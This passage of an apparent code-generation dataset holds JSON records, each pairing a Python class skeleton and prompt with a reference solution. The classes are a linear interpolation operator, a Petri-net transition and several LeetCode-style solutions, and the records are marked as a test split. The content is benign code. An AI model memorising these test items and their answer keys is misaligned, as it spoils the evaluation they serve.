dotd))\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000082", "length_bytes": 3325, "license_type": "no_license", "methods": [{"docstring": "lint constructor Parameters: nm - size of model (regularly sampled) om - origin of model axis dm - sampling of model axis nd - size of data (irregularly sampled) crd - input coordinates of the values (of the irregularly sampled data)", "name": "__init__", "signature": "def __init__(self, nm, om, dm, crd)"}, {"docstring": "Applies the forward linear interpolation operator Parameters: add - whether to add to the input (True/False) mod - input model numpy array dat - input data numpy array", "name": "forward", "signature": "def forward(self, add, mod, dat)"}, {"docstring": "Applies the adjoint transient convolution operator Parameters add - whether to add to the input (True/False) mod - output model numpy array dat - input data numpy array", "name": "adjoint", "signature": "def adjoint(self, add, mod, dat)"}, {"docstring": "Performs the dot product test of the operator", "name": "dottest", "signature": "def dottest(self, add=False)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_002275", "prompt": "Implement the Python class `lint` described below.\n\nClass description:\nA linear interpolation operator\n\nMethod signatures and docstrings:\n- def __init__(self, nm, om, dm, crd): lint constructor Parameters: nm - size of model (regularly sampled) om - origin of model axis dm - sampling of model axis nd - size of data (irregularly sampled) crd - input coordinates of the values (of the irregularly sampled data)\n- def forward(self, add, mod, dat): Applies the forward linear interpolation operator Parameters: add - whether to add to the input (True/False) mod - input model numpy array dat - input data numpy array\n- def adjoint(self, add, mod, dat): Applies the adjoint transient convolution operator Parameters add - whether to add to the input (True/False) mod - output model numpy array dat - input data numpy array\n- def dottest(self, add=False): Performs the dot product test of the operator", "prompted_full_text": "Implement the Python class `lint` described below.\n\nClass description:\nA linear interpolation operator\n\nMethod signatures and docstrings:\n- def __init__(self, nm, om, dm, crd): lint constructor Parameters: nm - size of model (regularly sampled) om - origin of model axis dm - sampling of model axis nd - size of data (irregularly sampled) crd - input coordinates of the values (of the irregularly sampled data)\n- def forward(self, add, mod, dat): Applies the forward linear interpolation operator Parameters: add - whether to add to the input (True/False) mod - input model numpy array dat - input data numpy array\n- def adjoint(self, add, mod, dat): Applies the adjoint transient convolution operator Parameters add - whether to add to the input (True/False) mod - output model numpy array dat - input data numpy array\n- def dottest(self, add=False): Performs the dot product test of the operator\n\n<|skeleton|>\nclass lint:\n \"\"\"A linear interpolation operator\"\"\"\n\n def __init__(self, nm, om, dm, crd):\n \"\"\"lint constructor Parameters: nm - size of model (regularly sampled) om - origin of model axis dm - sampling of model axis nd - size of data (irregularly sampled) crd - input coordinates of the values (of the irregularly sampled data)\"\"\"\n <|body_0|>\n\n def forward(self, add, mod, dat):\n \"\"\"Applies the forward linear interpolation operator Parameters: add - whether to add to the input (True/False) mod - input model numpy array dat - input data numpy array\"\"\"\n <|body_1|>\n\n def adjoint(self, add, mod, dat):\n \"\"\"Applies the adjoint transient convolution operator Parameters add - whether to add to the input (True/False) mod - output model numpy array dat - input data numpy array\"\"\"\n <|body_2|>\n\n def dottest(self, add=False):\n \"\"\"Performs the dot product test of the operator\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.__nm = nm\n self.__om = om\n self.__dm = dm\n self.__nd = len(crd)\n self.__crd = crd\n if self.__crd.shape[0] != self.__nd:\n raise Exception('coordinate array must be same length as data')\n<|end_body_0|>\n\n<|body_start_1|>\n if mod.shape[0] != self.__nm or dat.shape[0] != self.__nd:\n raise Exception('lint forward: input shapes do not match those passed to constructor')\n if add == False:\n dat[:] = 0.0\n forward_lint(self.__om, self.__dm, self.__nm, self.__nd, self.__crd, mod, dat)\n<|end_body_1|>\n\n<|body_start_2|>\n if mod.shape[0] != self.__nm or dat.shape[0] != self.__nd:\n raise Exception('lint adjoint: input shapes do not match those passed to constructor')\n if add == False:\n mod[:] = 0.0\n adjoint_lint(self.__om, self.__dm, self.__nm, self.__nd, self.__crd, mod, dat)\n<|end_body_2|>\n\n<|body_start_3|>\n m = np.random.rand(self.__nm).astype('float32')\n mh = np.zeros(self.__nm, dtype='float32')\n d = np.random.rand(self.__nd).astype('float32')\n dh = np.zeros(self.__nd, dtype='float32')\n if add:\n self.forward(True, m, dh)\n self.adjoint(True, mh, d)\n dotm = np.dot(m, mh)\n dotd = np.dot(d, dh)\n print('Dot product test (add==True):')\n print('Dotm = %f Dotd = %f' % (dotm, dotd))\n print('Absolute error = %f' % abs(dotm - dotd))\n print('Relative error = %f' % (abs(dotm - dotd) / dotd))\n else:\n self.forward(False, m, dh)\n self.adjoint(False, mh, d)\n dotm = np.dot(m, mh)\n dotd = np.dot(d, dh)\n print('Dot product test (add==False):')\n print('Dotm = %f Dotd = %f' % (dotm, dotd))\n print('Absolute error = %f' % abs(dotm - dotd))\n print('Relative error = %f' % (abs(dotm - dotd) / dotd))\n<|end_body_3|>\n", "revision_id": "32a303eddd13385d8778b8bb3b4fbbfbe78bea51", "skeleton": "<|skeleton|>\nclass lint:\n \"\"\"A linear interpolation operator\"\"\"\n\n def __init__(self, nm, om, dm, crd):\n \"\"\"lint constructor Parameters: nm - size of model (regularly sampled) om - origin of model axis dm - sampling of model axis nd - size of data (irregularly sampled) crd - input coordinates of the values (of the irregularly sampled data)\"\"\"\n <|body_0|>\n\n def forward(self, add, mod, dat):\n \"\"\"Applies the forward linear interpolation operator Parameters: add - whether to add to the input (True/False) mod - input model numpy array dat - input data numpy array\"\"\"\n <|body_1|>\n\n def adjoint(self, add, mod, dat):\n \"\"\"Applies the adjoint transient convolution operator Parameters add - whether to add to the input (True/False) mod - output model numpy array dat - input data numpy array\"\"\"\n <|body_2|>\n\n def dottest(self, add=False):\n \"\"\"Performs the dot product test of the operator\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class lint:\n \"\"\"A linear interpolation operator\"\"\"\n\n def __init__(self, nm, om, dm, crd):\n \"\"\"lint constructor Parameters: nm - size of model (regularly sampled) om - origin of model axis dm - sampling of model axis nd - size of data (irregularly sampled) crd - input coordinates of the values (of the irregularly sampled data)\"\"\"\n self.__nm = nm\n self.__om = om\n self.__dm = dm\n self.__nd = len(crd)\n self.__crd = crd\n if self.__crd.shape[0] != self.__nd:\n raise Exception('coordinate array must be same length as data')\n\n def forward(self, add, mod, dat):\n \"\"\"Applies the forward linear interpolation operator Parameters: add - whether to add to the input (True/False) mod - input model numpy array dat - input data numpy array\"\"\"\n if mod.shape[0] != self.__nm or dat.shape[0] != self.__nd:\n raise Exception('lint forward: input shapes do not match those passed to constructor')\n if add == False:\n dat[:] = 0.0\n forward_lint(self.__om, self.__dm, self.__nm, self.__nd, self.__crd, mod, dat)\n\n def adjoint(self, add, mod, dat):\n \"\"\"Applies the adjoint transient convolution operator Parameters add - whether to add to the input (True/False) mod - output model numpy array dat - input data numpy array\"\"\"\n if mod.shape[0] != self.__nm or dat.shape[0] != self.__nd:\n raise Exception('lint adjoint: input shapes do not match those passed to constructor')\n if add == False:\n mod[:] = 0.0\n adjoint_lint(self.__om, self.__dm, self.__nm, self.__nd, self.__crd, mod, dat)\n\n def dottest(self, add=False):\n \"\"\"Performs the dot product test of the operator\"\"\"\n m = np.random.rand(self.__nm).astype('float32')\n mh = np.zeros(self.__nm, dtype='float32')\n d = np.random.rand(self.__nd).astype('float32')\n dh = np.zeros(self.__nd, dtype='float32')\n if add:\n self.forward(True, m, dh)\n self.adjoint(True, mh, d)\n dotm = np.dot(m, mh)\n dotd = np.dot(d, dh)\n print('Dot product test (add==True):')\n print('Dotm = %f Dotd = %f' % (dotm, dotd))\n print('Absolute error = %f' % abs(dotm - dotd))\n print('Relative error = %f' % (abs(dotm - dotd) / dotd))\n else:\n self.forward(False, m, dh)\n self.adjoint(False, mh, d)\n dotm = np.dot(m, mh)\n dotd = np.dot(d, dh)\n print('Dot product test (add==False):')\n print('Dotm = %f Dotd = %f' % (dotm, dotd))\n print('Absolute error = %f' % abs(dotm - dotd))\n print('Relative error = %f' % (abs(dotm - dotd) / dotd))\n", "source": "the_stack_v2_python_sparse", "source_path": "opt/linopt/essops/lintjit.py", "source_repo": "ke0m/scaas", "split": "test", "star_events_count": 2} {"blob_id": "8269c1ce29e78769d11083c2d0e86a680e9228ea", "bodies": ["super(DiscreteTransition, self).__init__(transition_id, label, firing_condition, consumption_speeds, production_speeds)\nself.delay = delay\nself.delay_counter = 0", "input_place_tokens = self.get_input_place_tokens()\nif self.firing_condition(input_place_tokens) == True:\n if self.delay_counter == int(self.delay / time_step):\n super().fire(1)\n self.delay_counter = 0\n else:\n self.delay_counter += 1\nelse:\n self.delay_counter = 0"], "bodies_text": "<|body_start_0|>\n super(DiscreteTransition, self).__init__(transition_id, label, firing_condition, consumption_speeds, production_speeds)\n self.delay = delay\n self.delay_counter = 0\n<|end_body_0|>\n\n<|body_start_1|>\n input_place_tokens = self.get_input_place_tokens()\n if self.firing_condition(input_place_tokens) == True:\n if self.delay_counter == int(self.delay / time_step):\n super().fire(1)\n self.delay_counter = 0\n else:\n self.delay_counter += 1\n else:\n self.delay_counter = 0\n<|end_body_1|>\n", "class_docstring": "", "class_name": "DiscreteTransition", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DiscreteTransition:\n\n def __init__(self, transition_id, label, firing_condition, consumption_speeds, production_speeds, delay):\n \"\"\"In addition to the arguments specified in the super class ContinuousTransition, a delay function must be specified for a discrete transition. Args: delay (int): number of time-steps after which transition is fired if firing_condition still holds true.\"\"\"\n <|body_0|>\n\n def fire(self, time_step):\n \"\"\"Check if the firing condition is satisfied during the delay.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(DiscreteTransition, self).__init__(transition_id, label, firing_condition, consumption_speeds, production_speeds)\n self.delay = delay\n self.delay_counter = 0\n<|end_body_0|>\n\n<|body_start_1|>\n input_place_tokens = self.get_input_place_tokens()\n if self.firing_condition(input_place_tokens) == True:\n if self.delay_counter == int(self.delay / time_step):\n super().fire(1)\n self.delay_counter = 0\n else:\n self.delay_counter += 1\n else:\n self.delay_counter = 0\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000083", "length_bytes": 32459, "license_type": "permissive", "methods": [{"docstring": "In addition to the arguments specified in the super class ContinuousTransition, a delay function must be specified for a discrete transition. Args: delay (int): number of time-steps after which transition is fired if firing_condition still holds true.", "name": "__init__", "signature": "def __init__(self, transition_id, label, firing_condition, consumption_speeds, production_speeds, delay)"}, {"docstring": "Check if the firing condition is satisfied during the delay.", "name": "fire", "signature": "def fire(self, time_step)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003292", "prompt": "Implement the Python class `DiscreteTransition` described below.\n\nClass description:\nImplement the DiscreteTransition class.\n\nMethod signatures and docstrings:\n- def __init__(self, transition_id, label, firing_condition, consumption_speeds, production_speeds, delay): In addition to the arguments specified in the super class ContinuousTransition, a delay function must be specified for a discrete transition. Args: delay (int): number of time-steps after which transition is fired if firing_condition still holds true.\n- def fire(self, time_step): Check if the firing condition is satisfied during the delay.", "prompted_full_text": "Implement the Python class `DiscreteTransition` described below.\n\nClass description:\nImplement the DiscreteTransition class.\n\nMethod signatures and docstrings:\n- def __init__(self, transition_id, label, firing_condition, consumption_speeds, production_speeds, delay): In addition to the arguments specified in the super class ContinuousTransition, a delay function must be specified for a discrete transition. Args: delay (int): number of time-steps after which transition is fired if firing_condition still holds true.\n- def fire(self, time_step): Check if the firing condition is satisfied during the delay.\n\n<|skeleton|>\nclass DiscreteTransition:\n\n def __init__(self, transition_id, label, firing_condition, consumption_speeds, production_speeds, delay):\n \"\"\"In addition to the arguments specified in the super class ContinuousTransition, a delay function must be specified for a discrete transition. Args: delay (int): number of time-steps after which transition is fired if firing_condition still holds true.\"\"\"\n <|body_0|>\n\n def fire(self, time_step):\n \"\"\"Check if the firing condition is satisfied during the delay.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(DiscreteTransition, self).__init__(transition_id, label, firing_condition, consumption_speeds, production_speeds)\n self.delay = delay\n self.delay_counter = 0\n<|end_body_0|>\n\n<|body_start_1|>\n input_place_tokens = self.get_input_place_tokens()\n if self.firing_condition(input_place_tokens) == True:\n if self.delay_counter == int(self.delay / time_step):\n super().fire(1)\n self.delay_counter = 0\n else:\n self.delay_counter += 1\n else:\n self.delay_counter = 0\n<|end_body_1|>\n", "revision_id": "8e9a3a8151069757475808c48511c9d7486ea334", "skeleton": "<|skeleton|>\nclass DiscreteTransition:\n\n def __init__(self, transition_id, label, firing_condition, consumption_speeds, production_speeds, delay):\n \"\"\"In addition to the arguments specified in the super class ContinuousTransition, a delay function must be specified for a discrete transition. Args: delay (int): number of time-steps after which transition is fired if firing_condition still holds true.\"\"\"\n <|body_0|>\n\n def fire(self, time_step):\n \"\"\"Check if the firing condition is satisfied during the delay.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DiscreteTransition:\n def __init__(self, transition_id, label, firing_condition, consumption_speeds, production_speeds, delay):\n \"\"\"In addition to the arguments specified in the super class ContinuousTransition, a delay function must be specified for a discrete transition. Args: delay (int): number of time-steps after which transition is fired if firing_condition still holds true.\"\"\"\n super(DiscreteTransition, self).__init__(transition_id, label, firing_condition, consumption_speeds, production_speeds)\n self.delay = delay\n self.delay_counter = 0\n\n def fire(self, time_step):\n \"\"\"Check if the firing condition is satisfied during the delay.\"\"\"\n input_place_tokens = self.get_input_place_tokens()\n if self.firing_condition(input_place_tokens) == True:\n if self.delay_counter == int(self.delay / time_step):\n super().fire(1)\n self.delay_counter = 0\n else:\n self.delay_counter += 1\n else:\n self.delay_counter = 0\n", "source": "the_stack_v2_python_sparse", "source_path": "HFPN model/utils/hfpn.py", "source_repo": "PN-Alzheimers-Parkinsons/PN_Alzheimers_Parkinsons", "split": "test", "star_events_count": 0} {"blob_id": "8ee134eb1a352e68769346f3324b5c772d69229c", "bodies": ["new = sorted(nums)\nl, r = (0, len(nums) - 1)\nwhile l < r and nums[l] == new[l]:\n l += 1\nwhile l < r and nums[r] == new[r]:\n r -= 1\nreturn r - l + 1 if r > l else 0", "l, r = (0, len(nums) - 1)\nwhile l < r and nums[l] <= nums[l + 1]:\n l += 1\nwhile l < r and nums[r] >= nums[r - 1]:\n r -= 1\nif l == r:\n return 0\nmin_, max_ = (min(nums[l:r + 1]), max(nums[l:r + 1]))\nl, r = (0, len(nums) - 1)\nwhile l < r and min_ >= nums[l]:\n l += 1\nwhile l < r and max_ <= nums[r]:\n r -= 1\nreturn r - l + 1"], "bodies_text": "<|body_start_0|>\n new = sorted(nums)\n l, r = (0, len(nums) - 1)\n while l < r and nums[l] == new[l]:\n l += 1\n while l < r and nums[r] == new[r]:\n r -= 1\n return r - l + 1 if r > l else 0\n<|end_body_0|>\n\n<|body_start_1|>\n l, r = (0, len(nums) - 1)\n while l < r and nums[l] <= nums[l + 1]:\n l += 1\n while l < r and nums[r] >= nums[r - 1]:\n r -= 1\n if l == r:\n return 0\n min_, max_ = (min(nums[l:r + 1]), max(nums[l:r + 1]))\n l, r = (0, len(nums) - 1)\n while l < r and min_ >= nums[l]:\n l += 1\n while l < r and max_ <= nums[r]:\n r -= 1\n return r - l + 1\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def findUnsortedSubarray1(self, nums: List[int]) -> int:\n \"\"\"原数组排序再比较,求出左右两边不满足要求的索引\"\"\"\n <|body_0|>\n\n def findUnsortedSubarray2(self, nums: List[int]) -> int:\n \"\"\"1.从数组两端遍历找破坏升序顺序的索引,从而确定需要无序的连续子数组 2.在无序子数组中找出最大值和最小值 3.再次从两端遍历,找出最大值和最小值正确的索引,两者之差即为最短无序子数组\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n new = sorted(nums)\n l, r = (0, len(nums) - 1)\n while l < r and nums[l] == new[l]:\n l += 1\n while l < r and nums[r] == new[r]:\n r -= 1\n return r - l + 1 if r > l else 0\n<|end_body_0|>\n\n<|body_start_1|>\n l, r = (0, len(nums) - 1)\n while l < r and nums[l] <= nums[l + 1]:\n l += 1\n while l < r and nums[r] >= nums[r - 1]:\n r -= 1\n if l == r:\n return 0\n min_, max_ = (min(nums[l:r + 1]), max(nums[l:r + 1]))\n l, r = (0, len(nums) - 1)\n while l < r and min_ >= nums[l]:\n l += 1\n while l < r and max_ <= nums[r]:\n r -= 1\n return r - l + 1\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000084", "length_bytes": 1656, "license_type": "no_license", "methods": [{"docstring": "原数组排序再比较,求出左右两边不满足要求的索引", "name": "findUnsortedSubarray1", "signature": "def findUnsortedSubarray1(self, nums: List[int]) -> int"}, {"docstring": "1.从数组两端遍历找破坏升序顺序的索引,从而确定需要无序的连续子数组 2.在无序子数组中找出最大值和最小值 3.再次从两端遍历,找出最大值和最小值正确的索引,两者之差即为最短无序子数组", "name": "findUnsortedSubarray2", "signature": "def findUnsortedSubarray2(self, nums: List[int]) -> int"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def findUnsortedSubarray1(self, nums: List[int]) -> int: 原数组排序再比较,求出左右两边不满足要求的索引\n- def findUnsortedSubarray2(self, nums: List[int]) -> int: 1.从数组两端遍历找破坏升序顺序的索引,从而确定需要无序的连续子数组 2.在无序子数组中找出最大值和最小值 3.再次从两端遍历,找出最大值和最小值正确的索引,两者之差即为最短无序子数组", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def findUnsortedSubarray1(self, nums: List[int]) -> int: 原数组排序再比较,求出左右两边不满足要求的索引\n- def findUnsortedSubarray2(self, nums: List[int]) -> int: 1.从数组两端遍历找破坏升序顺序的索引,从而确定需要无序的连续子数组 2.在无序子数组中找出最大值和最小值 3.再次从两端遍历,找出最大值和最小值正确的索引,两者之差即为最短无序子数组\n\n<|skeleton|>\nclass Solution:\n\n def findUnsortedSubarray1(self, nums: List[int]) -> int:\n \"\"\"原数组排序再比较,求出左右两边不满足要求的索引\"\"\"\n <|body_0|>\n\n def findUnsortedSubarray2(self, nums: List[int]) -> int:\n \"\"\"1.从数组两端遍历找破坏升序顺序的索引,从而确定需要无序的连续子数组 2.在无序子数组中找出最大值和最小值 3.再次从两端遍历,找出最大值和最小值正确的索引,两者之差即为最短无序子数组\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n new = sorted(nums)\n l, r = (0, len(nums) - 1)\n while l < r and nums[l] == new[l]:\n l += 1\n while l < r and nums[r] == new[r]:\n r -= 1\n return r - l + 1 if r > l else 0\n<|end_body_0|>\n\n<|body_start_1|>\n l, r = (0, len(nums) - 1)\n while l < r and nums[l] <= nums[l + 1]:\n l += 1\n while l < r and nums[r] >= nums[r - 1]:\n r -= 1\n if l == r:\n return 0\n min_, max_ = (min(nums[l:r + 1]), max(nums[l:r + 1]))\n l, r = (0, len(nums) - 1)\n while l < r and min_ >= nums[l]:\n l += 1\n while l < r and max_ <= nums[r]:\n r -= 1\n return r - l + 1\n<|end_body_1|>\n", "revision_id": "2bbb1640589aab34f2bc42489283033cc11fb885", "skeleton": "<|skeleton|>\nclass Solution:\n\n def findUnsortedSubarray1(self, nums: List[int]) -> int:\n \"\"\"原数组排序再比较,求出左右两边不满足要求的索引\"\"\"\n <|body_0|>\n\n def findUnsortedSubarray2(self, nums: List[int]) -> int:\n \"\"\"1.从数组两端遍历找破坏升序顺序的索引,从而确定需要无序的连续子数组 2.在无序子数组中找出最大值和最小值 3.再次从两端遍历,找出最大值和最小值正确的索引,两者之差即为最短无序子数组\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def findUnsortedSubarray1(self, nums: List[int]) -> int:\n \"\"\"原数组排序再比较,求出左右两边不满足要求的索引\"\"\"\n new = sorted(nums)\n l, r = (0, len(nums) - 1)\n while l < r and nums[l] == new[l]:\n l += 1\n while l < r and nums[r] == new[r]:\n r -= 1\n return r - l + 1 if r > l else 0\n\n def findUnsortedSubarray2(self, nums: List[int]) -> int:\n \"\"\"1.从数组两端遍历找破坏升序顺序的索引,从而确定需要无序的连续子数组 2.在无序子数组中找出最大值和最小值 3.再次从两端遍历,找出最大值和最小值正确的索引,两者之差即为最短无序子数组\"\"\"\n l, r = (0, len(nums) - 1)\n while l < r and nums[l] <= nums[l + 1]:\n l += 1\n while l < r and nums[r] >= nums[r - 1]:\n r -= 1\n if l == r:\n return 0\n min_, max_ = (min(nums[l:r + 1]), max(nums[l:r + 1]))\n l, r = (0, len(nums) - 1)\n while l < r and min_ >= nums[l]:\n l += 1\n while l < r and max_ <= nums[r]:\n r -= 1\n return r - l + 1\n", "source": "the_stack_v2_python_sparse", "source_path": "581_shortest-unsorted-continuous-subarray.py", "source_repo": "helloocc/algorithm", "split": "test", "star_events_count": 1} {"blob_id": "8dbc80234a765462be4bb6b6b2759f2416839cc8", "bodies": ["count = [0] * 121\nfor age in ages:\n count[age] += 1\nans = 0\nfor ageA, countA in enumerate(count):\n for ageB, countB in enumerate(count):\n if ageA * 0.5 + 7 >= ageB:\n continue\n if ageA < ageB:\n continue\n if ageA < 100 < ageB:\n continue\n ans += countA * countB\n if ageA == ageB:\n ans -= countA\nreturn ans", "bucket = [0] * 121\nct = collections.Counter()\nans = 0\nfor age in ages:\n ct[age] += 1\n a, b = (age / 2 + 8, age)\n for i in range(a, b):\n bucket[i] += 1\nfor age in ages:\n ans += bucket[age]\nfor k, v in ct.items():\n if v > 1 and k > 14:\n ans += v * (v - 1)\nreturn ans"], "bodies_text": "<|body_start_0|>\n count = [0] * 121\n for age in ages:\n count[age] += 1\n ans = 0\n for ageA, countA in enumerate(count):\n for ageB, countB in enumerate(count):\n if ageA * 0.5 + 7 >= ageB:\n continue\n if ageA < ageB:\n continue\n if ageA < 100 < ageB:\n continue\n ans += countA * countB\n if ageA == ageB:\n ans -= countA\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n bucket = [0] * 121\n ct = collections.Counter()\n ans = 0\n for age in ages:\n ct[age] += 1\n a, b = (age / 2 + 8, age)\n for i in range(a, b):\n bucket[i] += 1\n for age in ages:\n ans += bucket[age]\n for k, v in ct.items():\n if v > 1 and k > 14:\n ans += v * (v - 1)\n return ans\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def numFriendRequests_1(self, ages):\n \"\"\":type ages: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def numFriendRequests_2(self, ages):\n \"\"\":type ages: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n count = [0] * 121\n for age in ages:\n count[age] += 1\n ans = 0\n for ageA, countA in enumerate(count):\n for ageB, countB in enumerate(count):\n if ageA * 0.5 + 7 >= ageB:\n continue\n if ageA < ageB:\n continue\n if ageA < 100 < ageB:\n continue\n ans += countA * countB\n if ageA == ageB:\n ans -= countA\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n bucket = [0] * 121\n ct = collections.Counter()\n ans = 0\n for age in ages:\n ct[age] += 1\n a, b = (age / 2 + 8, age)\n for i in range(a, b):\n bucket[i] += 1\n for age in ages:\n ans += bucket[age]\n for k, v in ct.items():\n if v > 1 and k > 14:\n ans += v * (v - 1)\n return ans\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000085", "length_bytes": 1940, "license_type": "no_license", "methods": [{"docstring": ":type ages: List[int] :rtype: int", "name": "numFriendRequests_1", "signature": "def numFriendRequests_1(self, ages)"}, {"docstring": ":type ages: List[int] :rtype: int", "name": "numFriendRequests_2", "signature": "def numFriendRequests_2(self, ages)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def numFriendRequests_1(self, ages): :type ages: List[int] :rtype: int\n- def numFriendRequests_2(self, ages): :type ages: List[int] :rtype: int", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def numFriendRequests_1(self, ages): :type ages: List[int] :rtype: int\n- def numFriendRequests_2(self, ages): :type ages: List[int] :rtype: int\n\n<|skeleton|>\nclass Solution:\n\n def numFriendRequests_1(self, ages):\n \"\"\":type ages: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def numFriendRequests_2(self, ages):\n \"\"\":type ages: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n count = [0] * 121\n for age in ages:\n count[age] += 1\n ans = 0\n for ageA, countA in enumerate(count):\n for ageB, countB in enumerate(count):\n if ageA * 0.5 + 7 >= ageB:\n continue\n if ageA < ageB:\n continue\n if ageA < 100 < ageB:\n continue\n ans += countA * countB\n if ageA == ageB:\n ans -= countA\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n bucket = [0] * 121\n ct = collections.Counter()\n ans = 0\n for age in ages:\n ct[age] += 1\n a, b = (age / 2 + 8, age)\n for i in range(a, b):\n bucket[i] += 1\n for age in ages:\n ans += bucket[age]\n for k, v in ct.items():\n if v > 1 and k > 14:\n ans += v * (v - 1)\n return ans\n<|end_body_1|>\n", "revision_id": "0e99f9a5226507706b3ee66fd04bae813755ef40", "skeleton": "<|skeleton|>\nclass Solution:\n\n def numFriendRequests_1(self, ages):\n \"\"\":type ages: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def numFriendRequests_2(self, ages):\n \"\"\":type ages: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def numFriendRequests_1(self, ages):\n \"\"\":type ages: List[int] :rtype: int\"\"\"\n count = [0] * 121\n for age in ages:\n count[age] += 1\n ans = 0\n for ageA, countA in enumerate(count):\n for ageB, countB in enumerate(count):\n if ageA * 0.5 + 7 >= ageB:\n continue\n if ageA < ageB:\n continue\n if ageA < 100 < ageB:\n continue\n ans += countA * countB\n if ageA == ageB:\n ans -= countA\n return ans\n\n def numFriendRequests_2(self, ages):\n \"\"\":type ages: List[int] :rtype: int\"\"\"\n bucket = [0] * 121\n ct = collections.Counter()\n ans = 0\n for age in ages:\n ct[age] += 1\n a, b = (age / 2 + 8, age)\n for i in range(a, b):\n bucket[i] += 1\n for age in ages:\n ans += bucket[age]\n for k, v in ct.items():\n if v > 1 and k > 14:\n ans += v * (v - 1)\n return ans\n", "source": "the_stack_v2_python_sparse", "source_path": "medium/arrayandstring/test_825_Friends_Of_Appropriate_Ages.py", "source_repo": "wuxu1019/leetcode_sophia", "split": "test", "star_events_count": 1} {"blob_id": "bc1c98d3c79c8ef00f632237abf90120927a5443", "bodies": ["n = len(s)\nadjMap = defaultdict(set)\nfor start in range(n):\n left, right = (start, start)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n left, right = (start, start + 1)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\nqueue = deque([0])\nvisited = set([0])\ndepth = 0\nwhile queue:\n curLen = len(queue)\n for _ in range(curLen):\n cur = queue.popleft()\n if cur == n:\n return depth - 1\n for next in adjMap[cur]:\n if next not in visited:\n visited.add(next)\n queue.append(next)\n depth += 1\nreturn n - 1", "n = len(s)\nadjMap = defaultdict(set)\nfor start in range(n):\n left, right = (start, start)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n left, right = (start, start + 1)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n\n@lru_cache(None)\ndef dfs(index: int) -> int:\n if index >= n:\n return 0\n return min((1 + dfs(next) for next in adjMap[index]))\nreturn dfs(0) - 1"], "bodies_text": "<|body_start_0|>\n n = len(s)\n adjMap = defaultdict(set)\n for start in range(n):\n left, right = (start, start)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n left, right = (start, start + 1)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n queue = deque([0])\n visited = set([0])\n depth = 0\n while queue:\n curLen = len(queue)\n for _ in range(curLen):\n cur = queue.popleft()\n if cur == n:\n return depth - 1\n for next in adjMap[cur]:\n if next not in visited:\n visited.add(next)\n queue.append(next)\n depth += 1\n return n - 1\n<|end_body_0|>\n\n<|body_start_1|>\n n = len(s)\n adjMap = defaultdict(set)\n for start in range(n):\n left, right = (start, start)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n left, right = (start, start + 1)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n\n @lru_cache(None)\n def dfs(index: int) -> int:\n if index >= n:\n return 0\n return min((1 + dfs(next) for next in adjMap[index]))\n return dfs(0) - 1\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": 